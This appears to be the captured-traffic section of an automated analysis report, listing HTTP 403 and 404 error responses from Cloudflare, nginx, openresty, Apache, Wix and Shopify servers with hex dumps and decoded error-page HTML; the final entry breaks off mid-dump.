Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:52:50 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=onR2KVmbZQ2ibYPMDCJwljBOwHHTAMdvXeg06REAgO1A1KJS5PL8GyZNsfSpamfgQNS9F9UL%2B3XVm8RHic8W6pea%2BOPx9jR3chyBfdDW2oKX1vu7p4MKG9%2FllGhr4gU%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76cd33d451a86-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:52:50 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IwPbYvGfTtyRHa6TYCE4L4WxJOlhk7Ci9tkbJUMF5yPUK2fY6iH%2BhNWxMHgRyNTjA9iIWl5qAxEsF%2Bm0ROOv%2Fo2loxLe4Tv4FTgRtsj0W7WTMGb1tCeuKRpPma%2FqQEw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76cd3bddd1a86-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:52:55 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Thu, 27 Jul 2023 19:53:10 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xfqc1W%2FcYcqtMVerHC%2Fjts7zYN2qsuyIfDOau%2BpuOQX%2BcWcvSFe3TTJkI6m5hkgnKZFoySC8dfWuZoU1OIE9Zvu7DjKVPneU8Uml5Vd7HkzXo56pzyHOue7Ft7tcPrbw"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7ed76cf22e399042-FRAData Raw: 31 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 Data Ascii: 119f<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudfl
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Length: 548Content-Type: text/htmlX-Wix-Request-Id: 1690487575.41699945429816994X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Accept-Ranges: bytesDate: Thu, 27 Jul 2023 19:52:55 GMTX-Served-By: cache-lin2290021-LINX-Cache: MISSX-Seen-By: yvSunuo/8ld62ehjr5B7kA==,GXNXSWFXisshliUcwO20NQ1aV/eYQaI5OrqNssi0Z4KFbPzA2w5BhcpKxGOtqn2u,qquldgcFrj2n046g4RNSVL5pznunIc8dqFlAvDKHESQ=Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:52:55 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Thu, 27 Jul 2023 19:52:56 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:52:57 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:52:57 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 27 Jul 2023 19:52:58 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMd3kzTVEeNf/iB9j3c1cpqs,qquldgcFrj2n046g4RNSVL5pznunIc8dqFlAvDKHESQ=X-Wix-Request-Id: 1690487578.15918579221316686X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenTransfer-Encoding: chunkedServer: Microsoft-HTTPAPI/2.0Date: Thu, 27 Jul 2023 19:52:49 GMTData Raw: 30 0d 0a 0d 0a Data Ascii: 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:53:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=15X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: dfd566af-8204-4d0c-9f9c-14e484a8b2deCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=l4u90RDpdNyVPCXiPMoeYmV4F5NEJZ%2Fb9zEUYBJTi%2BTh8PGibro7q38XUB6nlYx3yJuKOexGt%2FcQZPRya2CKkqJwoYVBCaf1982DagWB6lzxeCuDdpu3Etl2CdDGTNUh3w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=144.999981Server: cloudflareCF-RAY: 7ed76d12bda9039a-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Jul 2023 19:53:01 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 